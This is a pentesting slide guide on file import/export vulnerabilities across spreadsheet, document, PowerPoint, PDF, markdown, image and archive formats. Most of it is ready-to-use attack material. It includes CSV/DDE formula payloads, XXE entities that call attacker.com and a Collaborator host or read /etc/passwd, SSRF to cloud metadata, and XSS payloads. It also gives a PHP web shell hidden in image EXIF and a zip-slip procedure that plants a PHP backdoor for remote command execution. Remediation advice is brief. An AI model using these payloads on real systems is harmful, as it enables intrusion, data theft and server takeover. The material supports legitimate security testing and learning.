IMPORT/EXPORT

FUNCTIONALITY
Security issues

By Rezaduty
SUBJECTS
What is import/export

Part of File Formats for Import/Export

Vulnerability in SpreadSheet Type

Vulnerability in Document Type

Vulnerability in Powerpoint Type

Vulnerability in HTML/PDF Type

Vulnerability in Markdown Type

Vulnerability in Image Type

Vulnerability in Archive Type

1
WHAT IS EXPORT
In a personal computer application, to export is to convert a file into

another format than the one it is currently in. Once the file is exported to

the desired format (specified in its file name suffix), it can be opened and

worked on by an application that recognizes and uses this format. Adobe

Photoshop and other programs use this term. Other applications such as

Word let you export a file by simply specifying the appropriate file name

suffix when you use the “Save as” selection.

WHAT IS IMPORT?
A file that has not been exported to a desired file format can be import ed

by an application program and then opened and used.

2
PART OF FILE FORMATS FOR IMPORT/EXPORT
SpreadSheet

.xls, .xlsx

.xltx

Document

.doc, .docx

.odt

Powerpoint

.pptx

HTM/PDF

.html

.pdf

Markdown

.md

Image

.png

.gif

.jpeg

.svg

Archive

.zip

3
VULNERABILITY IN SPREADSHEET TYPE
Many modern web applications and frameworks offer spreadsheet export

functionality, allowing users to download data in a .csv or .xls file suitable

for handling in spreadsheet applications like Microsoft Excel and

OpenOffice Calc. The resulting spreadsheet’s cells often contain input from

untrusted sources such as survey responses, transaction details, and user-

supplied addresses.

This is inherently risky, because any cells starting with the ‘=’ character will

be interpreted by the spreadsheet software as formulae. For example,

picture an online store that allows administrators to export the details of

all recent purchases. If a malicious customer buys a product and sets their

delivery address to the following:

=HYPERLINK("http://contextis.co.uk?leak="&A1&A2,"Error: please

click for further information")

CSV Injection, also known as Formula Injection, occurs when websites

embed untrusted input inside CSV files. When a spreadsheet program

such as Microsoft Excel or LibreOffice Calc is used to open a CSV, any cells

starting with ‘=’ will be interpreted by the software as a formula.

Maliciously crafted formulas can be used for three key attacks:

4
VULNERABILITY IN SPREADSHEET TYPE
Hijacking the user’s computer by exploiting vulnerabilities in the

spreadsheet software, such as CVE-2014–3524

Hijacking the user’s computer by exploiting the user’s tendency to ignore

security warnings in spreadsheets that they downloaded from their own

website

Exfiltrating contents from the spreadsheet, or other open spreadsheets.

For Example This Payloads for Open calc.exe:

DDE ("cmd";"/C calc";"!A0")A0

@SUM(1+1)*cmd|' /C calc'!A0

=cmd|' /C calc'!'A1'

This attack is difficult to mitigate, and explicitly disallowed from quite a few

bug bounty programs. To remediate it, ensure that no cells begin with any

of the following characters:

Equals to (“=”)

Plus (“+”)

Minus (“-“)

At (“@”)

5
VULNERABILITY IN SPREADSHEET TYPE
XXE and SSRF

Create a new blank Excel file. You can type stuff into some of the cells if

you want to but it’s really not necessary. Don’t have Excel installed? You

can use Google Sheets and then download as an xlsx.

Create a directory to unpack the Excel file into and unzip it.

Which file to use to attack the application will vary a little and it depends a

lot on libraries being used too. xl/workbook.xml provides an overview of

the workbook’s contents and is normally where most parsing begins as

this will contain a list of the sheets and their names.

The individual sheets themselves are under the xl/worksheets directory

and typically the contents end up in xl/sharedStrings.xml.

Open up xl/workbook.xml and insert the following.

<!DOCTYPE x [ <!ENTITY xxe SYSTEM

"http://gtdwmy7gvrncy5rvfu11kxzl2c82wr.burpcollaborator.net/"> ]>

<x>&xxe;</x>

or

<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>

<root>&test;</root>

6
VULNERABILITY IN SPREADSHEET TYPE
Now zip it up to create your new Excel file.

To remediate it, ensure that no cells begin with any of the following

characters:

Define a Blacklist

OLE Object xLinking

OLE Objects in LibreOffice work by fetching the contents of the remote

URL and displaying the contents inside of a frame. The OLE objects are

embedded in the content.xml of the LibreOffice files. By default, these x-

href links will not update on conversion. In fact, in OpenOffice/LibreOffice,

most of the time you need to enable link updates manually after you open

the document. This brings us to the popular Universal Office Converter

(unoconv), but more on that later in the blog post.

As long as x-href updates are enabled, you will be able to fetch arbitrary

contents. This can be seen by creating the following PoC:

1.Create a new spreadsheet in LibreOffice

2.Insert -> object -> ole object -> create from file

3.Checkbox “link to file”

4.Enter a url to an actual file (libre will fail on a 404)

5.Save the odt file

6.Open the odt file with zip tool like 7zip

7
VULNERABILITY IN SPREADSHEET TYPE
7.Modify content.xml, replacing the url with “file:///etc/passwd”.* find:

`<draw:object xlink:href=”https://[your server]/[your file]”

xlink:type=”simple” xlink:show=”embed” xlink:actuate=”onLoad”/>`*

replace: `<draw:object xlink:href="file:///etc/passwd"

xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/>`

8.Replace the content.xml in the odt file with your newly edited one

9.Rename file to test.odt.xlsx

10.Upload to a vulnerable web server that processes the document.

11.You can see the contents of /etc/passwd.

OLE object works like the following:

<draw:frame draw:style-name="fr1" draw:name="Object1"

text:anchor-type="paragraph" svg:width="6.6925in"

svg:height="1.1791in" draw:z-index="0"><draw:object

xlink:href="file:///etc/passwd" xlink:type="simple"

xlink:show="embed" xlink:actuate="onLoad"/><draw:image

xlink:href="./ObjectReplacements/Object 1" xlink:type="simple"

xlink:show="embed" xlink:actuate="onLoad"/></draw:frame>

8
VULNERABILITY IN SPREADSHEET TYPE
SSRF and LFD

OFD files have a features that support the xlink hrefs as well.One of these

features is called text sections. From here we were able to construct a

payload that allowed arbitrary read in a default styling that displayed the

full contents. This feature also allows the same file:// access as OLE

objects..

<office:text> <text:section text:name="string"> <text:section-

source xlink:href="http://169.254.169.254/latest/meta-data/

xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/>

</text:section></office:text>

VULNERABILITY IN DOCUMENT TYPE

Unzipping a DOCX or ODT file will create the following structure, that we

will change to include our XXE attack:

Looking at the file structure, you’ll see that there are a lot of XML files to

play with. One good bet is [Content_Types].xml, which will work well for

the XXE, by including the following after the first line:

<!DOCTYPE go [<!ENTITY % go2 SYSTEM "ls">%go2;

or

<!DOCTYPE go [<!ENTITY % go2 SYSTEM

"http://attacker.com/log">%go2;

zip -u xxe.docx \[Content_Types\].xml

Researchers at Cymulate found a vulnerability in Microsoft Word

documents with an embedded video player. This vulnerability lets anyone

inject HTML code in place of the expected Youtube iframe.

This PowerShell script exploits this known vulnerability in documents with

embedded online videos by injecting them with HTML code, replacing the

values of all pre-existing embeddedHtml tags. Microsoft Word will execute

any HTML you inject, here’s an example :

The process to inject the HTML code can be somewhat tedious. This script

attempts to automate this process.

10
VULNERABILITY IN SPREADSHEET TYPE
HTML Injection

PS C:\> . C:\scripts\docx-embedded-html.ps1PS C:\> Inject-Docx -Path

"C:\This\Is\A\test.docx" -HtmlBlock "<h3>Test</h3>"PS C:\> Inject-Docx -

Path "C:\This\Is\A\test.docx" -HtmlBlock "<h3>Test</h3>" -

DestinationName "destination.docx"

VULNERABILITY IN POWERPOINT TYPE

XXE and SSRF

1.Create a powerpoint slide.

2.Open the created file using winrar (a pptx file is actually an archive).

3.Extract the tableStyles.xml file which is located in the ppt folder and

open it in your favorite editor. It should look something like this:

<?xml version=”1.0" encoding=”UTF-8" standalone=”yes”?>

<a:tblStyleLst

xmlns:a=”http://schemas.openxmlformats.org/drawingml/2006/main

" def=”{5C22544A-7EE6–4342-B048–85BDC9FD1C3A}”/>

Now, setup a server where you can view incoming connections and save

the file to look like this:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <!DOCTYPE

r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd">]>

<r>&xxe;</r> <a:tblStyleLst

xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main

" def="{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}"/>
11
VULNERABILITY IN HTML/PDF TYPE
Have you ever surfed the internet and seen a “Download as PDF” button?

Over the past few years, many sites have added the option to export your

personal data to an accessible format, as PDF / Word.

When a website converts data to PDF, in most cases, what actually

happens is the following process

1.The web application gets the client’s data from a database / directly from

the client.

2.Put the data inside an HTML template*

3.Sends the custom HTML to an external library

4.The external library gets the HTML, does its magic and returns a PDF file

5.The client downloads the PDF file.

*In some cases, the web application downloads the whole HTML, including

the personal data, directly from the website itself with HTTP (e.g., from the

profile page of the user)

12
VULNERABILITY IN HTML/PDF TYPE
The most interesting part is the conversion from the custom HTML to the

PDF file by the external library.

I discovered that there are many players in the HTML to PDF market.

If we could inject an HTML tag to the conversion process, in some libraries,

we can download almost any file from the web server. For this attack

vector, we should use these tags:

iframe / frame

object

fonts (CSS)

13
VULNERABILITY IN HTML/PDF TYPE
Sometimes during a penetration test, after exposing a few vulnerabilities I

come to a dead end. In many cases, what separates me from a significant

progress is the inability to disclose information about the server and the

internal network.The “Export Injection”, in all the libraries, gives us the

option to obtain a lot of information about the server. Some techniques

that have occurred to me:

Internal port scanning: by the delay of the response from the web server,

we can reveal if a port is open or closed. For example, if we send a

malicious IMG tag:

<img src=”http://127.0.0.1:445”/> — Delay of 2.3 seconds (The port is

open)

<img src=”http://127.0.0.1:666”/> — Delay of 4.8 seconds (The port is

close)

Internal resources access: we can use the Object, Iframe and Frame tags to

access internal HTTP interfaces and watch the responses. For example:

<object data=”http://127.0.0.1:8443”/>

The vulnerability exposes the site to a potential DOS attack. The external

libraries support parsing complex data (Images, fonts and more). An

attacker could abuse this mechanism and make the server work hard, if he

sent one the following tags:

<img src=”http://download.thinkbroadband.com/1GB.zip”/>

<iframe src=”http://example.com/RedirectionLoop.aspx”/>

14
VULNERABILITY IN MARKDOWN TYPE
Markdown is a simple language for writing and formatting content. By

simple, I mean there is a small amount of syntax to learn which allows

writers to write clean but aesthetically pleasing content. It’s used all over

the place, from Gists and readme files on GitHub to the very article you’re

reading right now.

A standardised syntax allows the same document to be displayed in

different ways by different markdown processors. A heading is always a

heading, but the processor can choose which font and weight to apply,

where to place the heading, and how the heading may or may not be

displayed in a table of contents.

Articles are better with visuals, especially puppers with collars. But behind

the scenes, Medium doesn’t store a web page of HTML and CSS, it stores a

markdown file. Behind the scenes, this good boy looks something like this:


The initial exploit, as it turns out, was quite simple. Working backwards

from the anchor code snippet above, we can see we have a few options.

We can either escape out of the href attribute and add some script that

fires on a DOM event. Or, we can keep it simple and place the code in the

href itself. Here’s what we’re shooting for:

<a href="javascript:alert(document.cookie)">Click Me</a>

15
VULNERABILITY IN MARKDOWN TYPE
We’ll keep our exploit simple for now and work to loftier goals later.

Comparing this goal with the link HTML and markdown above, we can see

the exploit should be simple. Put the payload in the parentheses and we

should be good to go!

[Do not click me](javascript:alert(document.cookie))

LFR

# this is h1 <script>x=new XMLHttpRequest;x.onload=function()

{document.write(this.responseText)};x.open(“GET”,”file:///etc/passwd

”);x.send();</script>

VULNERABILITY IN IMAGE TYPE

Picture uploads are used on many sites found on the internet. There are

multiple reasons why a website would allow a user to upload a picture to

it. For example, there are some sites allowing the user to set some kind of

avatar, while others allow the user to present photos.

With every feature added to a website, there is the need for hardening this

functionality. This holds true for simple things as allowing users to post

content, but is also important for allowing users to upload files. One may

think a picture upload is less dangerous than an arbitrary file upload. But it

comes with all the dangers that a general file upload has — like a Path

Traversal or maybe an arbitrary file upload allowing users to escalate their

privileges on the system.

16
VULNERABILITY IN IMAGE TYPE
In the following a technique will be presented which allows an attacker to

take over a machine running a webserver with activated PHP and using a

vulnerable image file upload.

First, you need to download the Exif Pilot tool from here.

Now open exif pilot and insert any image to hide malicious comment

inside it; from the screenshot, you can see I have chosen a shell.png image

and then click on EDIT EXIF/IPTC.

Further inside comment text field type

<?php system($_GET[‘c’]); ?>

as malicious code and click on ok.

Here the exif data has been edited successfully inside the image. This tool

replaces the malicious image from the original image in the same folder

and sent the original image into recycle bin.

Now past the above-copied path of the uploaded image inside the URL as

shown in the screenshot.

http://192.168.1.102/dvwa/vulnerabilities/fi/?

page=../../hackable/uploads/shell.png&c=ifconfig

or

http://192.168.1.102/dvwa/vulnerabilities/fi/?

page=../../hackable/uploads/shell.png&c=cat /etc/passwd

17
VULNERABILITY IN IMAGE TYPE
XSS

A file upload is a great opportunity to XSS an application. User restricted

area with an uploaded profile picture is everywhere, providing more

chances to find a developer’s mistake. If it happens to be a self XSS, just

take a look at the previous post.

Basically we have the following entry points for an attack.

1- The filename itself may be being reflected in the page so it’s just a

matter of naming the file with a XSS.

“ img src=x onerror=alert(1).png

2- Using the exiftool it’s possible to alter EXIF metadata which may lead to

a reflection somewhere:

exiftool -Artist=’ “><img src=1 onerror=alert(document.domain)>’

brute.jpeg

3-If the application allows the upload of a SVG file extension (which is also

an image type), a file with the following content can be used to trigger a

XSS:

<svg xmlns=”http://www.w3.org/2000/svg"

onload=”alert(document.domain)”/>

4-It’s easy to build a GIF image to carry a javascript payload for use as a

source of a script. This is useful to bypass the CSP (Content Security Policy)

protection “script-src ‘self’ ” (which doesn’t allow <script>alert(1)</script>,

for example) if we are able to successfully inject in the same domain, as

shown below.
18
VULNERABILITY IN IMAGE TYPE
XSS

To create such an image just use this as content and name it with .gif

extension:

GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

VULNERABILITY IN ARCHIVE TYPE

If you can upload a ZIP that is going to be decompressed inside the server,

you can do 2 things:

Symlink

Upload a link containing soft links to other files, then, accessing the

decompressed files you will access the linked files:

ln -s ../../../index.php symindex.txt

zip — symlinks test.zip symindex.txt

Decompress in different folders

The decompressed files will be created in unexpected folders.

One could easily assume that this setup protects from OS-level command

execution via malicious file uploads but unfortunately this is not true.

Since ZIP archive format supports hierarchical compression and we can

also reference higher level directories we can escape from the safe upload

directory by abusing the decompression feature of the target application.

An automated exploit to create this kind of files can be found here:

https://github.com/ptoomey3/evilarc

19
VULNERABILITY IN ARCHIVE TYPE
Decompress in different folders

python evilarc.py -o unix -d 5 -p /var/www/html/ rev.php

To achieve remote command execution I took the following steps:

1. Create a PHP shell:

<?php

if(isset($_REQUEST['cmd'])){

$cmd = ($_REQUEST['cmd']);

system($cmd);

}?>

2. Use “file spraying” and create a compressed zip file:

for i in `seq 1 10`;do FILE=$FILE”xxA”; cp simple-backdoor.php

$FILE”cmd.php”;done

zip cmd.zip xx*.php

Use a hexeditor or vi and change the “xxA” to “../”, with vi:

:set modifiable

:%s/xxA/..\//g

:x!

Done!

Only one step remained: Upload the ZIP file and let the application

decompress it! If it is succeeds and the web server has sufficient privileges

to write the directories there will be a simple OS command execution shell

on the system:

20
RESOURCES
4armed.com

techtarget.com

buer.haus

integrity.pt

hackerone.com/reports/334488

hackerone.com/reports/360727

medium.com/taptuit

securityonline.info

usd.de

hackingarticles.in

brutelogic.com.br

hacktricks.xyz

21